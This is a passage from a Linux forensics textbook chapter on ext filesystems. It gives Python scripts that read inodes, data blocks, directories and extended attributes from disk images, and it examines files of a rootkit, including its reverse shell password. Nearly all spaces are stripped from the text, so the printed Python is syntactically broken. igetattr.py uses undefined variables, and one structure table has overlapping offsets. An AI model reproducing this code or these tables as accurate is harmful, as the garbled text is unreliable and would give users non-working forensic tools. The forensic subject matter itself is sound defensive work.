
#ext4uses256byteinodesonthedisk

#asofJuly2015thelogicalsizeis156bytes

#thefirstwordisthesizeoftheextrainfo

ifinodeSize>128:

self.inodeSize=128+getU16(data,0x80)

#thisistheupperwordofthechecksum

ifself.inodeSize>0x82:

self.checksum+=getU16(data,0x82)*pow(2,16)

#theseextrabitsgivenanosecondaccuracyoftimestamps

#thelower2bitsareusedtoextendthe32-bitseconds

#sincetheepochcounterto34bits

#ifyouarestillusingthisscriptin2038youshould

#adjustthisscriptaccordingly:-)

ifself.inodeSize>0x84:

self.changeTimeNanosecs=getU32(data,0x84)>>2

ifself.inodeSize>0x88:

self.modifyTimeNanosecs=getU32(data,0x88)>>2

ifself.inodeSize>0x8c:

self.accessTimeNanosecs=getU32(data,0x8c)>>2

ifself.inodeSize>0x90:

self.createTime=time.gmtime(getU32(data,0x90))

self.createTimeNanosecs=getU32(data,0x94)>>2

else:

self.createTime=time.gmtime(0)

defprettyPrint(self):

fork,vinsorted(self.__dict__.iteritems()):

ifk==‘extents’andself.extents:

v[0].prettyPrint()#printheader

foriinrange(1,v[0].entries+1):

v[i].prettyPrint()

elifk==‘changeTime’ork==‘modifyTime’or\

k==‘accessTime’\

ork==‘createTime’:

printk+”:”,time.asctime(v)

elifk==‘deleteTime’:

ifcalendar.timegm(v)==0:

print‘Deleted:no’

else:

printk+”:”,time.asctime(v)

else:

printk+”:”,v

Theresultsofrunningistat.pywiththeupdatedextfs.pyfileareshowninFigure7.22.Thehighlightedlinesshownwhathasbeenadded.

FIGURE7.22

Results of running istat.py against an inode associated with a rootkit on the PFE subject system. Thehighlightedlinesshowinformationabouttheextentusedtostorethisfile.

Nowthatwecanread theblock informationforboth traditionalblocksandextents,ascript to retrieve a file from its inode is easily created. The new script will be namedicat.py.TheSleuthKitprovidesasimilarutilitynamedicat.Wewillbeginbyaddingtwonewhelperfunctionstoextfs.py.Thenewcodefollows.#getadatablockfromanimage

defgetDataBlock(imageFilename,offset,blockNo,blockSize=4096):

withopen(str(imageFilename),‘rb’)asf:

f.seek(blockSize*blockNo+offset*512)

data=str(f.read(blockSize))

returndata

“””

functiongetBlockList

Thisfunctionwillreturnalistofdatablocks

ifextentsarebeingusedthisshouldbesimpleassuming

thereisasingleleveltothetree.

Forextentswithmultiplelevelsandforindirectblocks

additional“diskaccess”isrequired.

Usage:bl=getBlockList(inode,imageFilename,offset,blockSize)

whereinodeistheinodeobject,imageFilenameisthenameofa

rawimagefile,offsetistheoffsetin512bytesectorstothe

startofthefilesystem,andblockSize(default4096)isthe

sizeofadatablock.

“””

defgetBlockList(inode,imageFilename,offset,blockSize=4096):

#nowgetthedatablocksandoutputthem

datablocks=[]

ifinode.extents:

#greatweareusingextents

#extentzerohastheheader

#checkfordepthofzerowhichismostcommon

ifinode.extents[0].depth==0:

foriinrange(1,inode.extents[0].entries+1):

sb=inode.extents[i].startHi*pow(2,32)+\

inode.extents[i].startLo

eb=sb+inode.extents[i].len#reallyendsinthisminus1

forjinrange(sb,eb):

datablocks.append(j)

else:

#loadthislevelofthetree

currentLevel=inode.extents

leafNode=[]

whilecurrentLevel[0].depth!=0:

#readthecurrentlevel

nextLevel=[]

foriinrange(1,currentLevel[0].entries+1):

blockNo=currentLevel[i].leafLo+\

currentLevel[i].leafHi*pow(2,32)

currnode=getExtentTree(getDataBlock(imageFilename,\

offset,blockNo,blockSize))

nextLevel.append(currnode)

ifcurrnode[0].depth==0:

#ifthereareleavesaddthemtotheend

leafNode.append(currnode[1:])

currentLevel=nextLevel

#nowsortthelistbylogicalblocknumber

leafNode.sort(key=lambdax:x.block)

forleafinleafNode:

sb=leaf.startHi*pow(2,32)+leaf.startLo

eb=sb+leaf.len

forjinrange(sb,eb):

datablocks.append(j)

else:

#wehavetheoldschoolblocks

blocks=inode.fileSize/blockSize

#getthedirectblocks

foriinrange(0,12):

datablocks.append(inode.block[i])

ifi>=blocks:

break

#nowdoindirectblocks

ifblocks>12:

iddata=getDataBlock(imageFilename,offset,\

inode.block[12],blockSize)

foriinrange(0,blockSize/4):

idblock=getU32(iddata,i*4)

ifidblock==0:

break

else:

datablocks.append(idblock)

#nowdoubleindirectblocks

ifblocks>(12+blockSize/4):

diddata=getDataBlock(imageFilename,offset,\

inode.block[13],blockSize)

foriinrange(0,blockSize/4):

didblock=getU32(diddata,i*4)

ifdidblock==0:

break

else:

iddata=getDataBlock(imageFilename,offset,\

didblock,blockSize)

forjinrange(0,blockSize/4):

idblock=getU32(iddata,j*4)

ifidblock==0:

break

else:

datablocks.append(idblock)

#nowtripleindirectblocks

ifblocks>(12+blockSize/4+blockSize*blockSize/16):

tiddata=getDataBlock(imageFilename,offset,\

inode.block[14],blockSize)

foriinrange(0,blockSize/4):

tidblock=getU32(tiddata,i*4)

iftidblock==0:

break

else:

diddata=getDataBlock(imageFilename,offset,\

tidblock,blockSize)

forjinrange(0,blockSize/4):

didblock=getU32(diddata,j*4)

ifdidblock==0:

break

else:

iddata=getDataBlock(imageFilename,offset,\

didblock,blockSize)

forkinrange(0,blockSize/4):

idblock=getU32(iddata,k*4)

ifidblock==0:

break

else:

datablocks.append(idblock)

returndatablocks

The first helper function, getDataBlock, simply seeks to the correct place in the fileimage and then reads a blockof data.The second function, getBlockList, is a bitmoreinvolved.Itbeginswithachecktoseeifextentsareinuse.Ifextentsarebeingused,mostfileshavenothingbutleafnodesinthefourentriesfromtheinodeblockarray.Wedoaquickchecktoseeifthetreedepthiszeroand,ifthisisthecase,simplyreadtheentriesfromtheinodeblockarray.Wedothisnotjusttosimplifythecodeforthemostcommoncase,butalsobecausenofurtherdiskaccessisrequiredtogenerateablocklist.

Ifwehaveamulti-leveltree,wesavethecurrentlevelofinodesandcreateanemptylistof leaf nodes. We then begin a while loop on the line while

currentLevel[0].depth!=0:.Thisloopwillexecuteuntilthelowestlevel(leafnodes)ofthetreehasbeenfound.AnyleafnodesencounteredwhilewalkingthroughthetreeareappendedtotheleafNodelist.

AfterexitingthewhilelooptheleafNodelistissortedbylogicalblocknumberonthelineleafNode.sort(key=lambdax:x.block).Pythonhastheabilitytosortalist inplace.Inorder tosort thelistwerequireasortingfunctionthat ispassedintothesortmethodastheparameternamedkey.Thisiswherethelambdacomesin.InPythonalambda is an anonymous function. The construct key=lambda x: x.block isessentiallythesameassayingkey=f(x)wheref(x)isdefinedasfollows:

deff(x):

returnx.block

Youcaneasilyseewhyyouwouldn’twant todefineanamedfunction like thiseverytimeyouwantedtoperformasortorotheroperationrequiringasingleusefunction.ThelambdakeywordmakesyourPythoncodemuchmorecompactandeasiertounderstandonceyouknowhowitworks.

The code to handle old school blocks is straightforward, but somewhat cumbersome,thankstothenestedloopstohandletheindirectblocks.Firstwecalculatethenumberofblocks required. Then we read in the direct blocks. If the file has any singly indirectblocksweusegetDataBlocktoreadtheblockandtheniterateoverthelistofupto1024blocks.We keep going until we hit the end of the list or an address of zero (which isinvalid).Iftheaddressiszero,thebreakcommandisexecuted.Thiscommandwillexitthecurrentloop.Ifthecurrentloopisnestedinsideanotherloop,onlytheinnermostloopis exited. The doubly and triply indirect block handling code is similar, butwith extralevelsofnestedloops.

The icat.py script follows. It is similar to the istat.py filewith the biggest differencebeingacalltogetBlockListfollowedbyaloopthatprints(writes)everyblocktostandardout.#!/usr/bin/python

#

#icat.py

#

#ThisisasimplePythonscriptthatwill

#printoutfileforinaninodefromanext2/3/4filesysteminside

#ofanimagefile.

#

#DevelopedforPentesterAcademy

#byDr.PhilPolstra(@ppolstra)

importextfs

importsys

importos.path

importsubprocess

importstruct

importtime

frommathimportlog

defusage():

print(“usage“+sys.argv[0]+\

“<imagefile><offset><inodenumber>\n”\

“Displaysfileforaninodefromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<3:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopennedforreading”)

exit(1)

emd=extfs.ExtMetadata(sys.argv[1],sys.argv[2])

#getinodelocation

inodeLoc=extfs.getInodeLoc(sys.argv[3],\

emd.superblock.inodesPerGroup)

offset=emd.bgdList[inodeLoc[0]].inodeTable*

emd.superblock.blockSize+\

inodeLoc[1]*emd.superblock.inodeSize

withopen(str(sys.argv[1]),‘rb’)asf:

f.seek(offset+int(sys.argv[2])*512)

data=str(f.read(emd.superblock.inodeSize))

inode=extfs.Inode(data,emd.superblock.inodeSize)

datablock=extfs.getBlockList(inode,sys.argv[1],sys.argv[2],\

emd.superblock.blockSize)

fordbindatablock:

sys.stdout.write(extfs.getDataBlock(sys.argv[1],long(sys.argv[2]),\

db,emd.superblock.blockSize))

if__name__==“__main__”:

main()

Partialresultsfromrunningicat.pyagainstaninodeassociatedwitharootkitareshownin Figure 7.23. The output from the script has been piped toxxd in order to properlydisplay the hex values inside this program. The screenshot shows several embeddedstringswhichcontainerrormessagesandeventhereverseshellpasswordof“sw0rdm4n”.

FIGURE7.23

Partialresultsfromicat.pyagainstaninodeassociatedwitharootkitonthePFEsubjectsystem.Theoutputhasbeenpipedtoxxd.Notethatseveralerrormessagesandtheremote loginpasswordarevisible in thisscreenshot.

DirectoryentriesWe have learned that inodes contain all the metadata for a file. They also contain thelocationofthefile’sdatablocks.Theonlythingthatremainstobeknownaboutafileisits name.This connection between an inode and a filename ismade in directories.Notsurprisingly,directoriesarestoredinfilesinLinux,theoperatingsystemwhereeverythingisafile.Inourdiscussionofinodesearlierinthischapterwedidsaythatinode2wasusedtostoretherootdirectory.

The classic directory entry consists of a 4-byte inode number, followed by a 2-byterecord length, thena2-bytenamelength,andfinally thenamewhichmaybeup to255characterslong.ThisisshowninTable7.15.Noticethatthenamelengthistwobytes,yetthemaximumnamelengthcanbestoredinonlyonebyte.Thismayhavebeendoneforbytealignmentpurposesoriginally.

Table7.15.Theclassicdirectoryentrystructure.

Offset Size Name Description

0x0 4 Inode Inode

0x4 2 Reclen Recordlength

0x6 2 Namelen Namelength

0x8 Name Namestring(upto255characters)

Realizing that the upper byte was unused, an (incompatible) filesystem feature, FileType,wascreatedtore-purposethisbytetoholdfiletypeinformation.Itshouldbefairlyobviouswhythisisontheincompatiblefeaturelist,asinterpretingthisaspartofthenamelengthwouldmakeitseemlikeallthefilenameshadbecomegarbled.Thisoptimizationspeedsupanyoperationsthatonlymakesenseforacertaintypeoffilebyeliminatingtheneedtoreadlotsofinodesmerelytodeterminefiletype.ThedirectoryentrystructureforsystemswiththeFileTypefeatureisshowninTable7.16.

Table7.16.DirectoryentrystructurewhenFileTypefeatureisenabled.

Offset Size Name Description

0x0 4 Inode Inode

0x4 2 Reclen

Recordlength

0x6 1 Namelen

Namelength

0x7 1 Filetype

0x00Unknown0x01Regular0x02Directory0x03Chardevice0x04Blockdevice0x05FIFO0x06Socket0x07Symlink

0x8 Name Namestring(upto255characters)

Theoriginaldirectorieshadnochecksumsorothertoolsforintegritychecking.Inorderto add this functionality without breaking existing systems, a special type of directoryentryknownas adirectory tailwasdeveloped.Thedirectory tail has an inodevalueofzerowhichisinvalid.Oldersystemsseethisandassumethattheendofthedirectory(tail)hasbeenreached.Therecord length issetcorrectly to12.Thedirectory tailstructure isshowninTable7.17.

Table7.17.Directorytailstructure.

Offset Size Name Description

0x0 4 Inode Settozero(inodezeroisinvalidsoitisignored)

0x4 2 Reclen Recordlength(setto12)

0x6 1 Namelen Namelength(settozerosoitisignored)

0x7 1 Filetype Setto0xDE

0x8 4 Checksum DirectoryleafblockCRC32checksum

Thelineardirectoriespresentedthusfarinthissectionarefineaslongasthedirectoriesdonotgrowtoolarge.Whendirectoriesbecomelarge,implementinghashdirectoriescanimproveperformance.Justasisdonewiththechecksum,hashentriesarestoredaftertheendofthedirectoryblockinordertofoololdsystemsintoignoringthem.Recallthatthereisanext4_indexflagintheinodethatwillalertcompatiblesystemstothepresenceofthehashentries.

The directory nodes are stored in a hashed balanced treewhich is often shortened tohtree.Wehaveseentreesinourdiscussionofextentsearlierinthischapter.ThosefamiliarwithNTFSknow thatdirectoriesonNTFS filesystemsare stored in trees. In theNTFScase,nodesarenamedbasedontheirfilename.Withhtreesonextendedfilesystemsnodesarenamedbytheirhashvalues.Becausethehashvalueisonlyfourbyteslong,collisionswilloccur.Forthisreason,oncearecordhasbeenlocatedbasedonthehashvalueastringcomparison of filenames is performed, and if the strings do notmatch, the next record(whichshouldhavethesamehash)ischeckeduntilamatchisfound.

Theroothashdirectoryblockstartswiththetraditional“.”and“..”directoryentriesforthisdirectoryandtheparentdirectory,respectively.Afterthesetwoentries(bothofwhichare twelvebytes long), there isa16-byteheader, followedby8-byteentries throughtheendoftheblock.TheroothashdirectoryblockstructureisshowninTable7.18.

Table7.18.Roothashdirectoryblockstructure.

Offset Size Name Description

0x0 12 Dotrec “.”directoryentry(12bytes)

0xC 12 DotDotrec “..”directoryentry(12bytes)

0x18 4 Inodeno Inodenumbersetto0tomakefollowingbeignored

0x1C 1 Hashversion

0x00Legacy0x03Legacyunsigned0x01HalfMD40x04UnsignedhalfMD40x02Tea0x05UnsignedTea

0x1D 1 Infolength Hashinfolength(0x8)

0x1E 1 Indirlevels Depthoftree

0x1F 1 Unusedflag

Flags(unused)

0x20 2 Limit Maxnumberofentriesthatfollowthisheader

0x22 2 Count Actualnumberofentriesafterheader

0x24 4 Block Blockw/idirectoryforhash=0

0x28 Entries Remainderofblockis8-byteentries

If thereareany interiornodes, theyhave thestructureshowninTable7.19.Note thatthreeof the fieldsare in italics.The reason for this is that Ihave foundsomecode thatreferstothesefieldsandotherplacesthatseemtoimplythatthesefieldsarenotpresent.

Table7.19.Interiornodehashdirectoryblockstructure.Entriesinitalicsmaynotbepresentinallsystems.

Offset Size Name Description

0x0 4 Fakeinode Settozerosothisisignored

0x4 2 Fakereclen Settoblocksize(4k)

0x6 4 Namelength Settozero

0x7 1 Filetype Settozero

0x8 2 Limit Maxentriesthatfollow

0xA 4 Count Actualentriesthatfollow

0xE 4 Block Blockw/idirectoryforlowesthashvalueofblock

0x12 Entries Directoryentries

The hash directory entries (leaf nodes) consist of two 4-byte values for the hash andblockwithinthedirectoryofthenextnode.Thehashdirectoryentriesareterminatedwithaspecialentrywithahashofzeroand thechecksumin thesecond4-bytevalue.TheseentriesareshowninTable7.20andTable7.21.

Table7.20.Hashdirectoryentrystructure.

Offset Size Name Description

0x0 4 Hash Hashvalue

0x4 4 Block Blockw/idirectoryofnextnode

Table7.21.Hashdirectoryentrytailwithchecksum.

Offset Size Name Description

0x0 4 Reserved Settozero

0x4 4 Checksum Blockchecksum

Wecannowaddsomecodetoourextfs.pyfileinordertointerpretdirectories.Tokeepthingssimple,wewon’tutilizethehashdirectoriesiftheyexist.Forourpurposesthereislikely to be little if any speed penalty for doing so. The additions to our extfs.py filefollow.

defprintFileType(ftype):

ifftype==0x0orftype>7:

return“Unknown”

elifftype==0x1:

return“Regular”

elifftype==0x2:

return“Directory”

elifftype==0x3:

return“Characterdevice”

elifftype==0x4:

return“Blockdevice”

elifftype==0x5:

return“FIFO”

elifftype==0x6:

return“Socket”

elifftype==0x7:

return“Symboliclink”

classDirectoryEntry():

def__init__(self,data):

self.inode=getU32(data)

self.recordLen=getU16(data,0x4)

self.nameLen=getU8(data,0x6)

self.fileType=getU8(data,0x7)

self.filename=data[0x8:0x8+self.nameLen]

defprettyPrint(self):

print(“Inode:%sFiletype:%sFilename:%s”%(str(self.inode),\

printFileType(self.fileType),self.filename))

#parsesdirectoryentriesinadatablockthatispassedin

defgetDirectory(data):

done=False

retVal=[]

i=0

whilenotdone:

de=DirectoryEntry(data[i:])

ifde.inode==0:

done=True

else:

retVal.append(de)

i+=de.recordLen

ifi>=len(data):

break

returnretVal

Therearenonewtechniquesinthecodeabove.Wecanalsocreateanewscript,ils.py,whichwillcreateadirectorylistingbasedonaninoderatherthanadirectoryname.Thecodeforthisnewscriptfollows.Youmightnoticethatthisscriptisverysimilartoicat.pywiththeprimarydifferencebeingthatthedataisinterpretedasadirectoryinsteadofbeingwrittentostandardout.#!/usr/bin/python

#

#ils.py

#

#ThisisasimplePythonscriptthatwill

#printoutfileforinaninodefromanext2/3/4filesysteminside

#ofanimagefile.

#

#DevelopedforPentesterAcademy

#byDr.PhilPolstra(@ppolstra)

importextfs

importsys

importos.path

importsubprocess

importstruct

importtime

frommathimportlog

defusage():

print(“usage“+sys.argv[0]+“<imagefile><offset><inodenumber>\n”\

“Displaysdirectoryforaninodefromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<3:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopennedforreading”)

exit(1)

emd=extfs.ExtMetadata(sys.argv[1],sys.argv[2])

#getinodelocation

inodeLoc=extfs.getInodeLoc(sys.argv[3],\

emd.superblock.inodesPerGroup)

offset=emd.bgdList[inodeLoc[0]].inodeTable\

*emd.superblock.blockSize+\

inodeLoc[1]*emd.superblock.inodeSize

withopen(str(sys.argv[1]),‘rb’)asf:

f.seek(offset+int(sys.argv[2])*512)

data=str(f.read(emd.superblock.inodeSize))

inode=extfs.Inode(data,emd.superblock.inodeSize)

datablock=extfs.getBlockList(inode,sys.argv[1],sys.argv[2],\

emd.superblock.blockSize)

data=“”

fordbindatablock:

data+=extfs.getDataBlock(sys.argv[1],long(sys.argv[2]),db,\

emd.superblock.blockSize)

dir=extfs.getDirectory(data)

forfnameindir:

fname.prettyPrint()

if__name__==“__main__”:

main()

Theresultsfromrunningthenewscriptagainsttherootdirectory(inode2)andthe/tmpdirectory from the PFE subject system are shown in Figure 7.24 and Figure 7.25,respectively.Notice that the“lost+found”directory is in inode11which is theexpectedplace.InFigure7.25twofilesassociatedwitharootkitarehighlighted.

FIGURE7.24

Runningils.pyagainsttherootdirectoryofthePFEsubjectsystem.

FIGURE7.25

Runningils.pyagainstthe/tmpdirectoryofthePFEsubjectsystem.

ExtendedattributesThe extended filesystem family supports extended attributes. The first use of extendedattributeswas forAccessControl Lists (ACL).While it is certainly not uncommon forextendedattributestohouseACLstoday,theycanbeusedtostorealmostanythingasauserattributeiftheattributenamebeginswith“user.”.Somethingtokeepinmindisthatolder kernels required the correct set of mounting options to be used when ACLs areimplemented. This is another reason to capture themount information during your liveanalysis.

If the extended attribute is small, it can be stored in the extra space between inodes.Currentlythereare100bytesofextraspace.Largerextendedattributescanbestoredinadatablockpointed toby file_acl in the inode.Anattackermightuse auser attribute tohide information on a hacked system. This is similar to using Alternate Data Streams(ADS)toattachhiddeninformationtoafileonaNTFSfilesystem.Thereisoneimportantdifference between user attributes and ADS, however. There are standard tools fordisplayingextendedattributesonLinux,andyouneednotknowtheexactattributenametousethem,asisthecasewithADS.

Whetherstoredininodesordatablocks,allextendedattributelistsbeginwithaheader.Theheaderdoesvaryinthesetwocases,however.Theheaderinsidetheinodeconsistsofa4-bytemagicnumberonly.TheextendedattributesheaderstructureforattributesstoredintheinodeanddatablockareshowninTable7.22andTable7.23,respectively.

Table7.22.Extendedattributeheaderforattributesinaninode.

Offset Size Name Description

0x0 4 Magicno 0xEA020000

Table7.23.Extendedattributeheaderforattributesinadatablock.

Offset Size Name Description

0x0 4 Magicno 0xEA020000

0x4 4 Refcount Referencecount

0x8 4 Blocks Blocksusedtostoreextendedattributes

0xC 4 Hash Hash

0x10 4 Checksum Checksum

0x14 12 Reserved Shouldbezeroed

Theextendedattributeentryorentriesfollow(s)theheader.TheextendedattributeentrystructureisshowninTable7.24.Notetheuseofanameindexinordertoreducestorage.

Table7.24.Extendedattributeentrystructure.

Offset Size Name Description

0x0 1 Namelen

Lengthofattributename

0x1 1 Nameindex

0x0=noprefix0x1=user.prefix0x2=system.posix_acl_access0x3=system.posix_acl_default0x4=trusted.0x6=security.0x7=system.0x8=system.richacl

0x2 2 Valueoffs

Offsetfromfirstinodeentryorstartofblock

0x4 4 Valueblock

Diskblockwherevaluestoredorzeroforthisblock

0x8 4 Valuesize

Lengthofvalue

0xC 4 Hash Hashforattribsinblockorzeroifininode

0x10 Name Attributenamew/otrailingNULL

ThestandardLinuxcommandsfordisplayingextendedattributeandACLinformationare getfattr and getfacl, respectively. Not surprisingly, the commands to alterextendedattributesandACLsaresetfattrandsetfacl, respectively.See themanpagesfordetailsonthesecommands.BasicusageofthesecommandsisdemonstratedinFigure7.26.

FIGURE7.26

Usingthecommandstosetandgetextendedattributes.

The following code will add extended attribute support to our extfs Pythonmodule.Therearenopreviouslyundiscussedtechniquesinthiscode.“””

printExtAttrPrefix.Convertsa1-byteprefix

codeforanextendedattributenametoastring.

Usage:prefixString=printExtAttrPrefix(index)

“””

defprintExtAttrPrefix(index):

ifindex==0orindex>8:

return“”

elifindex==1:

return“user.”

elifindex==2:

return“system.posix_acl_access”

elifindex==3:

return“system.posix_acl_default”

elifindex==4:

return“trusted.”

elifindex==6:

return“security.”

elifindex==7:

return“system.”

elifindex==8:

return“system.richacl”

“””

ClassExtAttrEntry.Storestheraw

extendedattributestructurewiththe

prefixprependedtotheattributename.

Usage:ea=ExtAttrEntry(data,offset=0)

wheredataisapackedstringrepresentingthe

extendedattributeandoffsetisthestartingpoint

inthisblockofdataforthisentry.

“””

classExtAttrEntry():

def__init__(self,data,offset=0):

self.nameLen=getU8(data,offset+0x0)

self.nameIndex=getU8(data,offset+0x1)

self.valueOffset=getU16(data,offset+0x2)

self.valueBlock=getU32(data,offset+0x4)

self.valueSize=getU32(data,offset+0x8)

self.valueHash=getU32(data,offset+0xc)

self.name=printExtAttrPrefix(self.nameIndex)+\

str(data[offset+0x10:offset+0x10+self.nameLen])

“””

Usage:

getExtAttrsFromBlock(imageFilename,offset,blockNo,blocksize)

whereimageFilenameisarawext2/ext3/ext4image,offsetis

theoffsetin512bytesectorstothestartofthefilesystem,

blockNoisthedatablockholdingtheextendedattributes,and

blocksizeisthefilesystemblocksize(default=4k).

“””

defgetExtAttrsFromBlock(imageFilename,offset,\

blockNo,blockSize=4096):

data=getDataBlock(imageFilename,offset,\

blockNo,blockSize)

returngetExtAttrsHelper(False,imageFilename,\

offset,data,blockSize)

“””

Usage:

getExtAttrsInInode(imageFilename,offset,data,blocksize)

whereimageFilenameisarawext2/ext3/ext4image,offsetis

theoffsetin512bytesectorstothestartofthefilesystem,

dataisthepackedstringholdingtheextendedattributes,and

blocksizeisthefilesystemblocksize(default=4k).

“””

defgetExtAttrsInInode(imageFilename,offset,data,blockSize=4096):

returngetExtAttrsHelper(True,imageFilename,offset,data,blockSize)

#Thisisahelperfunctionfortheproceedingtwofunctions

defgetExtAttrsHelper(inInode,imageFilename,offset,data,blockSize=4096):

#firstfourbytesaremagicnumber

retVal={}

ifgetU32(data,0)!=0xEA020000:

returnretVal

done=False

ifinInode:

i=4

else:

i=32

whilenotdone:

eae=ExtAttrEntry(data,i)

#isthisanextendedattributeornot

ifeae.nameLen==0andeae.nameIndex==0andeae.valueOffset==0\

andeae.valueBlock==0:

done=True

else:

#intheinodeorexternalblock?

ifeae.valueBlock==0:

v=data[eae.valueOffset:eae.valueOffset+eae.valueSize]

else:

v=getDataBlock(imageFilename,offset,eae.valueBlock,\

blockSize)[eae.valueOffset:eae.valueOffset+eae.valueSize]

retVal[eae.name]=v

i+=eae.nameLen+12

ifi>=len(data):

done=True

returnretVal

The following script can be used to print out extended attributes for an inode in animage. I include thismostly for completeness. If youmount the filesystem image, it iseasytolistouttheseattributesusingstandardsystemtoolsdiscussedinthissection.#!/usr/bin/python

#

#igetattr.py

#

#ThisisasimplePythonscriptthatwill

#printoutextendedattributesinaninodefromanext2/3/4

#filesysteminsideofanimagefile.

#

#DevelopedforPentesterAcademy

#byDr.PhilPolstra(@ppolstra)

importextfs

importsys

importos.path

importsubprocess

importstruct

importtime

frommathimportlog

defusage():

print(“usage“+sys.argv[0]+“<imagefile><offset><inodenumber>\n”\

“Displaysextendedattributesinanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<3:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopennedforreading”)

exit(1)

emd=extfs.ExtMetadata(sys.argv[1],sys.argv[2])

#getinodelocation

inodeLoc=extfs.getInodeLoc(sys.argv[3],\

emd.superblock.inodesPerGroup)

offset=emd.bgdList[inodeLoc[0]].inodeTable*\

emd.superblock.blockSize+inodeLoc[1]*emd.superblock.inodeSize

withopen(str(sys.argv[1]),‘rb’)asf:

f.seek(offset+int(sys.argv[2])*512)

data=str(f.read(emd.superblock.inodeSize))

inode=extfs.Inode(data,emd.superblock.inodeSize)

ifinode.hasExtendedAttributes:

#isitintheinodeslackoradatablock

ifinode.extendAttribs==0:

attrs=extfs.getExtAttrsInInode(imageFilename,offset,\

data[inode.inodeSize:],emd.superblock.blockSize)

else:

attrs=extfs.getExtAttrsFromBlock(imageFilename,offset,\

blockNo,emd.superblock.blockSize)

fork,vinattrs.iteritems():

print“%s:%s”%(k,v)

else:

print‘Inode%shasnoextendedattributes’%(sys.argv[3])

if__name__==“__main__”:

main()

JOURNALINGAspreviouslymentioned, the journal isused to increase the likelihoodof thefilesystembeing inaconsistentstate.Aswithmost thingsLinux, the journalingbehavior ishighlyconfigurable.Thedefaultistoonlywritemetadata(notdatablocks)throughthejournal.This is done for performance reasons.The default can be changed via themount dataoption.Theoptiondata=journalcausesalldatablocks tobewritten throughthe journal.Thereareotheroptionsaswell.Seethemountmanpagefordetails.

Thejournalcausesdatatobewrittentwice.Thefirsttimedataiswrittentothediskasquicklyaspossible.Toaccomplishthis,thejournalisstoredinoneblockgroupandoftenistheonlythingstoredinthegroup.Thisminimizesdiskseektimes.Later,afterthedatahasbeencommittedtothejournal,theoperatingsystemwillwritethedatatothecorrectlocationonthediskandthenerasethecommitmentrecord.Thisnotonlyimprovesdataintegritybut it also improvesperformancebycachingmanysmallwritesbeforewritingeverythingtodisk.

Thejournalisnormallystoredininode8,butitmayoptionallybestoredonanexternaldevice.Thelatterdoesnotseemtobeverycommon.Regardlessofwhereitisstored,thejournal contains a special superblock that describes itself.When examining the journaldirectlyitisimportanttorealizethatthejournalstoresinformationinbigendianformat.ThejournalsuperblockissummarizedinTable7.25.

Table7.25.Thejournalsuperblock.

Offset Type Name Description

0x0 be32 h_magic Jbd2magicnumber,0xC03B3998

0x4 be32 h_blocktype Shouldbe4,journalsuperblockv2

0x8 be32 h_sequence TransactionIDforthisblock

0xC be32 s_blocksize Journaldeviceblocksize.

0x10 be32 s_maxlen Totalnumberofblocksinthisjournal.

0x14 be32 s_first Firstblockofloginformation.

0x18 be32 s_sequence FirstcommitIDexpectedinlog.

0x1C be32 s_start Blocknumberofthestartoflog.

0x20 be32 s_errno Errorvalue,assetbyjbd2_journal_abort().

0x24 be32 s_feature_compat Compatiblefeatures.0x1=Journalmaintainschecksums

0x28 be32 s_feature_incompat Incompatiblefeatureset.

0x2C be32 s_feature_ro_compat Read-onlycompatiblefeatureset.Therearen’tanyofthesecurrently.

0x30 u8 s_uuid[16] 128-bituuidforjournal.Thisiscomparedagainstthecopyintheext4superblockatmounttime.

0x40 be32 s_nr_users Numberoffilesystemssharingthisjournal.

0x44 be32 s_dynsuper Locationofdynamicsuperblockcopy.

0x48 be32 s_max_transaction Limitofjournalblockspertransaction.

0x4C be32 s_max_trans_data Limitofdatablockspertransaction.

0x50 u8 s_checksum_type Checksumalgorithmusedforthejournal.Probably1=crc32or4=crc32c.

0x51 0xAB Padding 0xABbytesofpadding

0xFC be32 s_checksum Checksumoftheentiresuperblock,withthisfieldsettozero.

0x100 u8 s_users[16*48] IDsofallfilesystemssharingthelog.

Thegeneralformatforatransactioninthejournalisadescriptorblock,followedbyoneormoredataorrevocationblocks,andacommitblockthatcompletesthetransaction.Thedescriptorblock startswith aheader (which is the sameas the first twelvebytesof thejournal superblock) and then has an array of journal block tags that describe thetransaction.Datablocksarenormallyidenticaltoblockstobewrittentodisk.Revocationblocks contain a list of blocks thatwere journaled in the past but should no longer bejournaledinthefuture.Themostcommonreasonforarevocationisifametadatablockischanged to a regular file data block. The commit block indicates the end of a journaltransaction.

I will not provide the internal structures for the journal blocks here for a couple ofreasons.First,thejournalblockstructurescandiffersignificantlybasedontheversionofjournalingandselectedoptions.Thejournalisaninternalstructurethatwasneverreallymeant tobe readbyhumans.Microsofthas releasednothingpubliclyabout theirNTFSjournalinginternals.TheonlyreasonwecanknowabouttheLinuxjournalinginternalsisthatitisopensource.

Second,therearefilesystemutilitiesinLinux,suchasfsck,thatcanproperlyreadthejournalandmakeanyrequiredchanges.Itislikelyabetterideatousethebuilt-inutilitiesthan to try and fix a filesystem by hand. If you do want to delve into the journalinginternals, there is no better source than the header andC files themselves. Thewiki atkernel.orgmayalsobehelpful.

SUMMARYTosaythatwelearneda littleaboutextendedfilesystemsin thischapterwouldbequitethe understatement. We have covered every feature likely to be found on an ext4filesystem as of this writing in considerable depth. We also learned a couple of newPythonandshellscriptingtechniquesalongtheway.Inthenextchapterwewilldiscusstherelativelynewfieldofmemoryforensics.

CHAPTER

8MemoryAnalysisINFORMATIONINTHISCHAPTER:

CreatingaVolatilityprofileGettingprocessinformationProcessmapsanddumpsGettingbashhistoriesUsingVolatilitycheckpluginsGettingnetworkinformationGettingfilesysteminformationfrommemory

VOLATILITYTheVolatility framework is anopen source toolwritten inPythonwhich allowsyou toanalyzememoryimages.WebrieflymentionedVolatilitywayback inChapter3on liveresponse. The first version of Volatility that supported Linux was released in October2012.HopefullyLinuxsupportinVolatilitywillcontinuetoevolve.

